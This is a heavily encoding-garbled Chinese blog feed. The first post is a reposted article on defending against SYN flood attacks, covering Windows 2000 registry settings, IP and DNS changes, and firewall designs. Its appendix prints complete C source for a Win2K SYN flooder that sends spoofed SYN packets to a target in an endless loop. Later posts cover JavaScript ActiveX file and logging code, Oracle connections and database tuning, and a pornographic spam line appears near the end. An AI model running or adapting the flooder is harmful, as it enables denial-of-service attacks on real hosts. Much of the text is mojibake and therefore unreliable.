 对于SYN Flood��d��Q�目前尚没有很好的监��和防�M�Ҏ��Q�不�q�如果系�l�管理员熟悉��d��Ҏ��和系�l�架构，通过一�p�d��的设定，也能从一定程度上降低被攻�ȝ��l�的负荷�Q�减轻负面的影响。（�q�正是我撰写本文的主要目的）一般来��_��如果一个系�l�（或主机）负荷�H�然升高甚至失去响应�Q��用Netstat 命��o能看到大量SYN_RCVD的半�q�接�Q�数�?gt;500或占总连接数�?0%以上�Q�，可以认定�Q�这个系�l�（或主机）遭到了SYN Flood��d��。遭到SYN Flood��d��后，首先要做的是取证�Q�通过Netstat –n –p tcp >resault.txt记录目前所有TCP�q�接状态是必要的，如果有嗅探器�Q�或者TcpDump之类的工��P��记录TCP SYN报文的所有细节也有助于以后追查和防�M�Q�需要记录的字段有：源地址、IP首部中的标识、TCP首部中的序列受��TTL值等�Q�这些信息虽然很可能是攻击者伪造的�Q�但是用来分析攻击者的心理状态和��d��E�序也不无帮助。特别是TTL��|��如果大量的攻��d��g��来自不同的IP但是TTL值却相同�Q�我们往往能推断出��d��者与我们之间的�\由器距离�Q�至��也可以通过�q��o特定TTL值的报文降低被攻�ȝ��l�的负荷�Q�在�q�种情况下TTL��g��d��报文不同的用户就可以恢复正常讉K��Q�前面曾�l�提到可以通过�~�短SYN Timeout旉��和设�|�SYN Cookie来进行SYN��d��保护�Q�对于Win2000�pȝ��Q�还可以通过修改注册表降低SYN Flood的危宻I��在注册表中作如下改动�Q?br />
 首先�Q�打开regedit�Q�找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters增加一个SynAttackProtect的键��|��c�d��为REG_DWORD�Q�取��D��围是0-2�Q�这个值决定了�pȝ��受到SYN��d��旉��取的保护措施�Q�包括减��系�l�SYN+ACK的重试的�ơ数�{�，默认值是0�Q�没有�Q何保护措施）�Q�推荐设�|�是2�Q�增加一个TcpMaxHalfOpen的键��|��c�d��为REG_DWORD�Q�取��D��围是100-0xFFFF�Q�这个值是�pȝ��允许同时打开的半�q�接�Q�默认情况下WIN2K PRO和SERVER�?00�Q�ADVANCED SERVER�?00�Q�这个值很隄��定，取决于服务器TCP负荷的状况和可能受到的攻��d��度，具体的值需要经�q�试验才能决定。增加一个TcpMaxHalfOpenRetried的键��|��c�d��为REG_DWORD�Q�取��D��围是 80-0xFFFF�Q�默认情况下WIN2K PRO和SERVER�?0�Q�ADVANCED SERVER�?00�Q�这个值决定了在什么情况下�pȝ��会打开SYN��d��保护。我们来分析一下Win2000的SYN��d��保护机制�Q�正常情况下�Q�Win2K对TCP�q�接的三�ơ握手有一个常规的讄��Q�包括SYN Timeout旉��、SYN-ACK的重试次数和SYN报文从�\由器到系�l�再到Winsock的�g时等�Q�这个常规设�|�是针对�pȝ��性能�q�行优化的（安全和性能往往�怺�矛盾�Q�所以可以给用户提供方便快捷的服务；一旦服务器受到��d��Q�SYN半连接的数量��过TcpMaxHalfOpenRetried的设�|�，�pȝ��会认��己受��C��SYN Flood��d��Q�此时设�|�在SynAttackProtect键��g��的选项开始作用，SYN Timeout旉��被减短，SYN-ACK的重试次数减��，�pȝ��也会自动对缓冲区中的报文�q�行延时�Q�避免对TCP/IP堆栈造成�q�大的冲击，力图��攻��d��宛_��到最低；如果��d��强度不断增大�Q�超�q�了TcpMaxHalfOpen��|��此时�pȝ��已经不能提供正常的服务了�Q�更重要的是保证�pȝ��不会崩溃�Q�所以系�l�将会丢弃�Q何超出TcpMaxHalfOpen��D��围的SYN报文�Q�应该是使用随机丢包�{�略�Q�，保证�pȝ��的稳定性。所以，对于需要进行SYN��d��保护的系�l�，我们可以��试/预测一下访问峰值时期的半连接打开量，以其作�ؓ参考设定TcpMaxHalfOpenRetried的��|��保留一定的余量�Q�，然后再以TcpMaxHalfOpenRetried�?.25倍作�?TcpMaxHalfOpen��|��q�样可以最大限度地发挥WIN2K自��n的SYN��d��保护机制。通过讄��注册表防御SYN Flood��d��Q�采用的�?#8220;挨打”的策略，无论�pȝ��如何强大�Q�始�l�不能光靠挨打支撑下去，除了挨打之外�Q?#8220;退�?#8221;也是一�U�比较有效的�Ҏ��?br />
 退让策略是��Z��SYN Flood��d��代码的一个缺��P��我们重新来分析一下SYN Flood��d��者的��程�Q�SYN Flood�E�序有两�U�攻��L��式，��Z��IP的和��Z��域名的，前者是��d��者自��p��行域名解析�ƈ��IP地址传递给��d��E�序�Q�后者是��d��E�序自动�q�行域名解析�Q�但是它们有一�Ҏ��相同的，��是一旦攻��d��始，��不会再�q�行域名解析�Q�我们的切入�Ҏ��是这里：假设一台服务器在受到SYN Flood��d��后迅速更换自��q��IP地址�Q�那么攻击者仍在不断攻�ȝ��只是一个空的IP地址�Q��ƈ没有��M��L��Q�而防御方只要��DNS解析更改到新的IP地址��p��在很短的旉��内（取决于DNS的刷新时��_��恢复用户通过域名�q�行的正常访问。�ؓ了迷惑攻击者，我们甚至可以攄��一�?#8220;牺牲”服务器让��d��者满��于��d��?#8220;效果”�Q�由于DNS�~�冲的原因，只要��d��者的��览器不重�v�Q�他讉K��的仍然是原先的IP地址�Q��?br />
 同样的原因，在众多的负蝲均衡架构中，��Z��DNS解析的负载均衡本�w�就拥有对SYN Flood的免疫力�Q�基于DNS解析的负载均衡能��用��L��h��分配��C��同IP的服务器��L��上，��d��者攻�ȝ��永远只是其中一台服务器�Q�虽然说��d��者也能不断去�q�行DNS��h��从而打破这�U?#8220;退�?#8221;�{�略�Q�但是一来这样增加了��d��者的成本�Q�二来过多的DNS��h��可以帮助我们�q�查��d��者的真正�t�迹�Q�DNS��h��不同�?SYN��d��Q�是需要返回数据的�Q�所以很难进行IP伪装�Q�。对于防火墙来说�Q�防御SYN Flood��d��的方法取决于防火墙工作的基本原理�Q�一般说来，防火墙可以工作在TCP层之上或IP层之下，工作在TCP层之上的防火墙称为网兛_��防火墙，�|�关型防火墙与服务器、客��h��之间的关�p�d��下图所�C�：

 外部TCP�q�接 内部TCP�q�接
 [客户机] =================>[防火墙] =================>[服务器]

 如上图所�C�，客户��Z��服务器之间�ƈ没有真正的TCP�q�接�Q�客��h��与服务器之间的所有数据交换都是通过防火墙代理的�Q�外部的DNS解析也同��h��向防火墙�Q�所以如果网站被��d��Q�真正受到攻�ȝ��是防火墙�Q�这�U�防火墙的优�Ҏ��E�_��性好�Q�抗打击能力强，但是因�ؓ所有的TCP报文都需要经�q�防火墙转发�Q�所以效率比较低�׃��客户机�ƈ不直接与服务器徏立连接，在TCP�q�接没有完成旉��火墙不会��d��后台的服务器建立新的 TCP�q�接�Q�所以攻击者无法越�q�防火墙直接��d��后台服务器，只要防火墙本�w�做的��够强壮，�q�种架构可以抉|��相当强度的SYN Flood��d��。但是由于防火墙实际建立的TCP�q�接��Cؓ用户�q�接数的两倍（防火墙两端都需要徏立TCP�q�接�Q�，同时又代理了所有的来自客户端的TCP��h��和数据传送，在系�l�访问量较大�Ӟ��防火墙自�w�的负荷会比较高�Q�所以这�U�架构�ƈ不能适用于大型网站。（我感觉，对于�q�样的防火墙架构�Q��?TCP_STATE��d��估计会相当有�?�Q?br />
 工作在IP层或IP层之下的防火墙（路由型防火墙�Q�工作原理有所不同�Q�它与服务器、客��h��的关�p�d��下图所�C�：

 [防火墙] 数据包修改�{�?br /> [客户机]========|=======================>[服务器]

 TCP�q�接
 客户机直接与服务器进行TCP�q�接�Q�防火墙��L��是�\由器的作用，它截��h��有通过的包�q�进行过滤，通过�q��o的包被�{发给服务器，外部的DNS解析也直接指向服务器�Q�这�U�防火墙的优�Ҏ��效率高，可以适应100Mbps-1Gbps的流量，但是�q�种防火墙如果配�|�不当，不仅可以让攻击者越�q�防火墙直接��d��内部服务器，甚至有可能放大攻�ȝ��强度�Q�导致整个系�l�崩溃�?br />
 在这两种基本模型之外�Q�有一�U�新的防火墙模型�Q�我个�h认�ؓ�q�是比较巧妙的，它集中了两种防火墙的优势�Q�这�U�防火墙的工作原理如下所�C�：

 �W�一阶段�Q�客��h��h��与防火墙建立�q�接�Q?br /> SYN SYN+ACK ACK
 [客户机]---- >[防火墙] => [防火墙]-------- >[客户机] => [客户机]--- >[防火墙]

 �W�二阶段�Q�防火墙伪装成客��h��与后台的服务器徏立连�?br /> [防火墙]< =========== >[服务器]

 TCP�q�接
 �W�三阶段�Q�之后所有从客户机来的TCP报文防火墙都直接转发�l�后台的服务器防火墙转发
 [客户机]< ======|======= >[服务器]

 TCP�q�接
 �q�种�l�构吸取了上两种防火墙的优点�Q�既能完全控制所有的SYN报文�Q�又不需要对所有的TCP数据报文�q�行代理�Q�是一�U�两全其��的�Ҏ��?nbsp;
 �q�来�Q�国外和国内的一些防火墙厂商开始研�I�带宽控制技术，如果能真正做��C��格控制、分配带宽，��p��很大�E�度上防御绝大多数的拒绝服务��d��Q�我们还是拭目以待吧�?br />

 附录�Q�Win2000下的SYN Flood�E�序
 改编自Linux下Zakath�~�写的SYN Flooder

 �~�译环境�Q�VC++6.0,�~�译旉��要包含ws2_32.lib

 //////////////////////////////////////////////////////////////////////////
 // //
 // SYN Flooder For Win2K by Shotgun //
 // //
 // THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath //
 // THANX Lion Hook FOR PROGRAM OPTIMIZATION //
 // //
 // Released: [2001.4] //
 // Author: [Shotgun] //
 // Homepage: //
 // [http://IT.Xici.Net] //
 // [http://WWW.Patching.Net] //
 // //
 //////////////////////////////////////////////////////////////////////////
 #include
 #include
 #include
 #include
 #define SEQ 0x28376839
 #define SYN_DEST_IP "192.168.15.250"http://被攻�ȝ��IP
 #define FAKE_IP "10.168.150.1" //伪装IP的�v始��|��本程序的伪装IP覆盖一个B�cȝ��D?br /> #define STATUS_FAILED 0xFFFF //错误�q�回�?br />
 typedef struct _iphdr //定义IP首部

 {

 unsigned char h_verlen; //4 位首部长�?4位IP版本�?br /> unsigned char tos; //8位服务类型TOS
 unsigned short total_len; //16位总长度（字节�Q?br /> unsigned short ident; //16位标�?br /> unsigned short frag_and_flags; //3位标志位
 unsigned char ttl; //8 位生存时�?TTL
 unsigned char proto; //8位协�?(TCP, UDP 或其�?
 unsigned short checksum; //16位IP首部校验�?br /> unsigned int sourceIP; //32位源IP地址
 unsigned int destIP; //32位目的IP地址
 }IP_HEADER;

 struct // 定义TCP伪首�?br /> {

 unsigned long saddr; //源地址
 unsigned long daddr; //目的地址
 char mbz;
 char ptcl; //协议�c�d��
 unsigned short tcpl; //TCP长度
 }psd_header;

 typedef struct _tcphdr //定义TCP首部
 {

 USHORT th_sport; //16位源端口
 USHORT th_dport; //16位目的端�?br /> unsigned int th_seq; //32位序列号
 unsigned int th_ack; //32位确认号
 unsigned char th_lenres; //4位首部长�?6位保留字
 unsigned char th_flag; //6位标志位
 USHORT th_win; //16位窗口大��?br /> USHORT th_sum; //16位校验和
 USHORT th_urp; //16位紧急数据偏�U�量
 }TCP_HEADER;

 //CheckSum:计算校验和的子函�?br />
 USHORT checksum(USHORT *buffer, int size)
 {

 unsigned long cksum=0;
 while(size >1) {
 cksum+=*buffer++;
 size -=sizeof(USHORT);
 }

 if(size ) {
 cksum += *(UCHAR*)buffer;
 }
 cksum = (cksum >> 16) + (cksum & 0xffff);
 cksum += (cksum >>16);
 return (USHORT)(~cksum);

 }

 // SynFlood��d��?br /> int main()
 {
 int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;
 int TimeOut=2000,SendSEQ=0;
 char SendBuf[128]={0};
 char RecvBuf[65535]={0};
 WSADATA wsaData;
 SOCKET SockRaw=(SOCKET)NULL;
 struct sockaddr_in DestAddr;
 IP_HEADER ip_header;
 TCP_HEADER tcp_header;
 //初始化SOCK_RAW
 if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
 fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode);
 ExitProcess(STATUS_FAILED);
 }
 SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));
 if (SockRaw==INVALID_SOCKET){
 fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError());
 ExitProcess(STATUS_FAILED);
 }
 flag=TRUE;
 //讄��IP_HDRINCL以自己填充IP首部
 ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
 If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n");
 __try{
 //讄��发送超�?br /> ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
 if(ErrorCode==SOCKET_ERROR){
 fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError());
 __leave;
 }

 memset(&DestAddr,0,sizeof(DestAddr));
 DestAddr.sin_family=AF_INET;
 DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
 FakeIpNet=inet_addr(FAKE_IP);
 FakeIpHost=ntohl(FakeIpNet);
 //填充IP首部
 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));
 //高四位IP版本��P��低四位首部长�?br /> ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度（字节�Q?br /> ip_header.ident=1; //16位标�?br /> ip_header.frag_and_flags=0; //3位标志位
 ip_header.ttl=128; //8位生存时间TTL
 ip_header.proto=IPPROTO_TCP;& nbsp; //8 位协�?TCP,UDP…)
 ip_header.checksum=0;& nbsp; //16 位IP首部校验�?br /> ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);& nbsp; //32 位源IP地址
 ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址
 //填充TCP首部
 tcp_header.th_sport=htons(7000);& nbsp; // 源端口号
 tcp_header.th_dport=htons(8080);& nbsp; // 目的端口�?br /> tcp_header.th_seq=htonl(SEQ+SendSEQ);& nbsp; //SYN 序列�?br /> tcp_header.th_ack=0; //ACK序列��L��?
 tcp_header.th_lenres= (sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位
 tcp_header.th_flag=2; //SYN 标志
 tcp_header.th_win=htons(16384); //�H�口大小
 tcp_header.th_urp=0; //偏移
 tcp_header.th_sum=0; //校验�?br /> //填充TCP伪首部（用于计算校验和，�q�不真正发送）
 psd_header.saddr=ip_header.sourceIP;& nbsp; // 源地址
 psd_header.daddr=ip_header.destIP;& nbsp; // 目的地址
 psd_header.mbz=0;
 psd_header.ptcl=IPPROTO_TCP;& nbsp; // 协议�c�d��
 psd_header.tcpl=htons(sizeof(tcp_header));& nbsp; //TCP 首部长度
 while(1) {
 //每发�?0,240个报文输��Z��个标�C�符
 printf(".");
 for(counter=0;counter<10240;counter++){
 if(SendSEQ++==65536) SendSEQ=1; & nbsp; // 序列号��@�?br /> //更改IP首部
 ip_header.checksum=0;& nbsp; //16 位IP首部校验�?br /> ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);& nbsp; //32 位源IP地址
 //更改TCP首部
 tcp_header.th_seq=htonl(SEQ+SendSEQ);& nbsp; //SYN 序列�?br /> tcp_header.th_sum=0; //校验�?br /> //更改TCP Pseudo Header
 psd_header.saddr=ip_header.sourceIP;
 // 计算TCP校验和，计算校验和时需要包括TCP pseudo header
 memcpy(SendBuf,&psd_header,sizeof(psd_header));
 memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
 tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
 //计算IP校验�?br /> memcpy(SendBuf,&ip_header,sizeof(ip_header));
 memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
 memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);
 datasize=sizeof(ip_header)+sizeof(tcp_header);
 ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
 //填充发送缓冲区
 memcpy(SendBuf,&ip_header,sizeof(ip_header));
 //发送TCP报文
 ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr));
 if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError());
 }//End of for
 }//End of While
 }//End of try

 __finally {

 if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
 WSACleanup();
 }
 return 0;
 }

天一 2009-09-18 09:58 发表评论

JavaScript �?Log �cȝ��具体实现

天一 — Fri, 10 Jul 2009 05:31:00 GMT
 �׃��现在jscript �~�写方式比以外负责很多，很多时候都比较难以调试�?��Z��方便日常�E�序中的调试�Q�摆弄些下面写Log Class ��需要内容记录下来�?br /> 下面��是具体源代码，此Class 只能�?IE��览器��用�?br />
1 LogClass.prototype = {
2
3 initialize : function(){
4
5 try{
6
7 this._fso = ""; //File 操作对象
8
9 this._folderspec = ""; // �c?nbsp;fileclass 处理路径
10
11 this._fso = new ActiveXObject("Scripting.FileSystemObject"); // 建立 ActiveXObject 对象
12
13 this._objDate = new Date();
14
15 this._DateString = this._objDate.format("yyMMdd");
16
17 this._DateString = "c:\\" + this._DateString + ".log" ;
18
19 this._folderspec = this._DateString;
20
21
22 }catch(e){
23
24 alert("file Class initialize Error : "+ e.number +" "+ e.description);
25
26 }
27
28 },
29 TRACE : function(Content){
30
31 try{
32
33 this.OpenTextFile(8,true);
34
35 _objDate = new Date();
36
37 _dateString = _objDate.format("yyyy-MM-dd hh:mm:ss");
38
39 this._otf.WriteLine(_dateString+"||"+Content);
40
41 this._otf.close();
42
43 }catch(e){
44
45 this._otf.Close();
46
47 alert("file Class TRACE Error : "+ e.number +" "+ e.description);
48
49 }
50
51 },
52 OpenTextFile : function(IOmode,format){
53
54 try{
55
56 this._otf = this._fso.OpenTextFile(this._folderspec,IOmode,true,format);
57
58 }catch(e){
59
60 this._otf.Close();
61
62 alert("file Class OpenTextFile Error : "+ e.number +" "+ e.description);
63
64 }
65
66 }
67
68 };

天一 2009-07-10 13:31 发表评论

数据库设计和数据库重�?-��小心得

天一 — Tue, 25 Nov 2008 13:53:00 GMT
对于一个��Y件系�l�，数据库设计是整个�pȝ��最核心的部分�?br />
但由于系�l�的需求是不断变化�Q��得在数据库设计变得十分重要而且困难�?br /> 在需求变化非常快情况下，有一部分��Z��认�ؓ要寻找一�U�设计方法以固定不变的表�l�构来适用不断变化需
求。这个观�Ҏ��十分不明智和以现时的技术上暂时不能实现。对于��Y件功能程序在需求不断变法时候，�?br /> 了适应新的需求，不断重构�pȝ��的代码。以相同的道理，数据库设计也是程序设计的一部分。那么，数据
库一样可以��用重构来实现适用不断变化的��Y件系�l��?br />
本�h认�ؓ数据库设计将会分��Z��个阶�D�进行：

�W�一阶段�Q�数据库功能上的设计�Q�由于在软�g�pȝ��的数据库建立初期�Q�数据库也只是以实现�pȝ��同能为目
标，对于�pȝ��性能优化��不会是数据库设计的重点�?br />
·建立软�g�pȝ��的比较通用功能基础表。在基础功能建立后，�pȝ��使用者会对系�l�部分功能作��价和�?br /> 改要求。而功能基��表设计�ؓ减少日后修改和维护量�Q�会��量设计通用和冗杂结构�?br />
·攉��软�g�pȝ��的一些基本信息。对于��Y件系�l�设计者来��_��对��Y件系�l�的中每个表数据量，�E�序上SQL�?br /> 使用�Q�系�l�的�J�忙时段以及周期�{�都会有比较初步评估。但对于数据库设计者来��_��q�些估计都是只一�?br /> 推断�q�没有实际数据支持。�ؓ�W�二阶段数据库修改和�l�护�Q�对软�g�pȝ��作一些基本数据收集是必要的�?br />
�W�二阶段为数据库�pȝ��能上优化�Q�主要是通过�W�一阶段攉��pȝ��数据库一些信息来对系�l�做修改和优�?br /> 数据库具体优化方案需要以攉��信息为基��来之际来�q�行指定�?br />
下面本�h�ȝ��下，数据库中一般有哪些斚w��需要进行优化�?br />
1优化�pȝ��的SQL�Q�具体有下面几点可以�q�行�Q?br /> ·对��用频�J�的SQL以创建具体功能存储过�E�来代替�Q�可以减��数据库�pȝ��对SQL�~�译和解�?br /> ·涉及到数据量大的表，��量建立基本视图来完成数据查询工�?br /> ·在程序中��量使用扚w��提交
(注：此方法在多数据更新和插入软�g�pȝ��?�Q�可以比较显著提高性能�?br /> 在提高系�l�性能的同�Ӟ��对程序的多线�E�控制技术上增加不少隑ֺ��?br /> 若线�E�控制出现问题，会对数据库带来灾难性破�?
·�E�序在��用SQL的时候，��量使用��消耗数据库资源的运行方�?br />
2 数据库表�l�构�?br /> ·在数据量大表中，��量减少非必要字�D늃�引徏立�?br /> �Q�注�Q?索引建立多了查询速度是可以很有效的提高，但随之而来的是插入数据消耗的数据库资源也提高了很多）
·大表需要进行分区存�?br /> �Q�注�Q�现在主��数据库都已�l�开始支持分区存储数据）
·在不影响�pȝ��的业务逻辑上，清理数据表中被废弃��用的字段
(注：在清理废弃的字段需要关注的��定�q�些字段是否真的已经被废弃，�E�序真的不再启用)

3 修改有问题的SQL
·在实现功能时候，�׃��旉��或者其他原因整个系�l�中肯定会有部分性能不优的SQL存在。第一阶段攉��的数据，现在��可以有效的�q�行使用。通过�q�些数据我们可以很有效地把这些不优的SQL[甚至是很烂]扑և�来，一条一条进行调�?br /> ·在调整SQL外，�q�需要对数据库内存或者共享空间等�{�进行调��_��使得数据库永�q�是处于最优的状态�?br />
以上是本��Z��些小��心得，如果不对的地�Ҏ��q�指教�?br />
 MK-TIANYI

天一 2008-11-25 21:53 发表评论

JavaScript 使用�cȝ��时候，一个很奇怪的问题

天一 — Fri, 30 May 2008 01:02:00 GMT
�׃��弟知识有限�Q�在使用JavaScript ��装�cȝ��时候遇��C��下面奇怪的问题�?br />

var AXML = Class.create();
AXML.prototype = {
 initialize : function(path){
 this.xmlDom = new ActiveXObject("Msxml2.DOMDocument");
 this.xmlDom.load(path);
 //this.xmlDom = xmlObject;
 alert(this.xmlDom); // 可以输出正确的变�?nbsp;Object
 this.path = path;
 },
 getHomePage : function(){
 alert(this.xmlDom); //变量变成了没定义
 alert(this.path); // 可以输出正确的变�?/span>
 }

};

是否在类中不能��?Object �c�d��传递呢�Q?br /> 因�ؓ�l�过��试�Q?span style="color: rgb(0, 0, 255);">this.path 是一个普通变量是可以正常使用的�?/span>

天一 2008-05-30 09:02 发表评论

JavaScript Connect DB

天一 — Thu, 25 Oct 2007 05:24:00 GMT
�׃��JavaScript 是一�U�轻量��别的语言。无论做囑�Ş�q�是做�Q何工作都需要依赖其他工兗��?/span>
现在我以在Windows�q�_��上做下面的例子�?br /> 1 利用Windows 的AtiveXObject,使用ODBC�q�接Oracle 数据库。�ƈ且取回特定的数据资料�?br />

 function Connect(){
 var conn = new ActiveXObject("ADODB.Connection");
 conn.open("DSN=ora9i;UID=test;PWD=123456");
 var rs = new ActiveXObject("ADODB.Recordset");
 var sql = "select * from tb_client where name = 'aaa'";
 rs.open(sql,conn,1,1);
 var showpage = ""+rs(0)+"||"+rs(1)+"||"+rs(2)+"";
 //alert(rs(0)+"||"+rs(1)+"||"+rs(2));
 //alert(rs(0)+"||"+rs(1)+"||"+rs(2));
 var page = document.getElementById("showpage")
 page.innerHTML = showpage;
 rs.close();
 }
只需要用上面的这�D�代码就�U�别可以�q�接数据�Q�取出client 表中数据�?nbsp;
记得要��用Close�Ҏ��啊。不然你的机器就惨了�?

天一 2007-10-25 13:24 发表评论

天一 — Sat, 20 Oct 2007 02:37:00 GMT

JavaScipt 是一件利器。若能正��利用，可以帮助我们完成很多工作
来我们显�C�Z��个基本的文本功能�Q�就是对文本文�g�q�行写操作�?br /> 看以下代码：

1 function WFile(ContentArray,FilePath)
2 {
3 var fso,f,i;
4 fso = new ActiveXObject("Scripting.FileSystemObject");
5 f = fso.OpenTextFile(FilePath,2);
6 for (var i = 0;i< ContentArray.length ;i++ )
7 {
8 f.WriteLine(ContentArray[i]);
9 }
10 f.close();
11 alert(" OK,The File has change Value. ");
12 }
JavaScript 依靠着Windows 提供的服务和功能�Q�来完成本��n想需要的效果�?br />
除了需要对文�g写，我们需要知道有哪些文�g�Q�再��定哪些需要增加内容，哪些不需要增加内宏V�?br />
下面函数��是JavaScript 获取某�\径下所有文件的函数

1 ///////////////////////////////////////////////////////////////
2 //获取所有文�?/span>
3 function getFolderList(folderspec)
4 {
5 var arrFloder = new Array();
6 var arrFile = new Array();
7 var fso = new ActiveXObject("Scripting.FileSystemObject");
8 doGetFolderList(arrFloder,folderspec,fso,arrFile);
9 return arrFile;
10 }
11 //////////////////////////////////////////////////////////////
12
13 //////////////////////////////////////////////////////////////
14 //�q�行递归获取子目录和目录中的文�g
15 function doGetFolderList(arrFloder,folderspec,fso,arrFile)
16 {
17 var f, fc1, fc2, s, i;
18 f = fso.GetFolder(folderspec);
19 fc1 = new Enumerator(f.SubFolders);
20 for(;!fc1.atEnd(); fc1.moveNext())
21 {
22 i = arrFloder.length;
23 arrFloder[i] = fc1.item();
24 //递归�Q�获取子目录
25 doGetFolderList(arrFloder,fc1.item(),fso,arrFile);
26 }
27 /////////////
28 fc2 = new Enumerator(f.files);
29 for(;!fc2.atEnd();fc2.moveNext())
30 {
31 i = arrFile.length;
32 //arrFile[i] = new Array(1);
33 arrFile[i] = fc2.item();
34 }
35 //alert(arrFile);
36
37 }

�q�里使用了一下递归的技巧，先确定子目录�Q�再层层递归�?br /> 请各位多多指教。若大家有更好的�Ҏ��Q�请留言交流学习�?

天一 2007-10-20 10:37 发表评论

天一 — Tue, 22 Aug 2006 11:28:00 GMT
一�?Logical I/O
1�?Block changes-修改数据��d��
2�?Current reads-更新数据��d��的数�?
3�?Consistent reads-查询数据��d��的数�?br /> 二�?Physical I/O
1�?Datafile reads��d��数据文�g的文件数�?
2�?Datafile writes写入数据文�g的文件数�?
3�?Redo writes写入重做日志的文件数�?br /> 三�?Event waits
1�?Contrl File IO-控制文�g的读写等待时�?
2�?Buffer busy-高速缓存繁忙等待时�?
3�?Other-其他的等待时��_��希望数据库开发�h员解析下�Q?
4�?Single block read-单个数据��d��的等候时�?
5�?Multi-block read-多个数据��d��的等候时�?
6�?Direct path read-直接��d��的等候时�?
7�?Datafile write-数据文�g写的�{�待旉��
8�?Log write-日志文�g写得�{�待旉��
四�?Sessions
1�?Idle-�I�闲session的数�?
2�?Active-正在�q�行的session的数�?
3�?System-system session的数�?
五�?Call rates
1�?Parse分析��h��执行的SQL语句的调用次�?
2�?Execute-执行的次�?
3�?Commit-提交的调用次�?
4�?Rollback-回滚的调用次�?
5�?Hard parse-分析��h��执行的SQL语句�Q��ƈ分配堆栈�I�间的访问调用次�?br /> 六�?Miss rates
1�?Buffer cache-在高速缓存读取不命中�?
2�?SQL area-向高速缓存请求分析SQL语句的不命中�?
3�?Latch-�W�一�ơ尝试闭锁请求的不命中率
七�?SGA Memory Usage
1�?Fixed SGA-固定SGA区的大小
2�?Log Buffer-日志高速缓存的大小
3�?Shared Pool-�׃�n池的大小
4�?Buffer Cache-高速缓存的大小
八�?Shared Pool
1�?Misc-混合使用区的大小
2�?Dict Cache-数据字典�~�存区的大小
3�?Library Cache-库的高速缓�?
4�?Free memory-�I�闲的缓存的大小
5�?SQL Area-SQL语句的缓存区的大��?
在这些指标之中，Event waits�Q�Call rates�q�个两个是要特别注意的。数据库的性能问题�Q�往往都是在这两个中表现出来的�? 以上观点�U�属个�h意见�Q�如有类同纯属��y合�?

天一 2006-08-22 19:28 发表评论

亚洲AV一二三区成人影片,亚洲精品中文字幕乱码三区,老司机亚洲精品影视www

【�{】SYN ��d��讲解

JavaScript �?Log �cȝ��具体实现

数据库设计和数据库重�?-���小心得

JavaScript 使用�cȝ��时候，一个很奇怪的问题

JavaScript Connect DB

数据库设计和数据库重�?-��小心得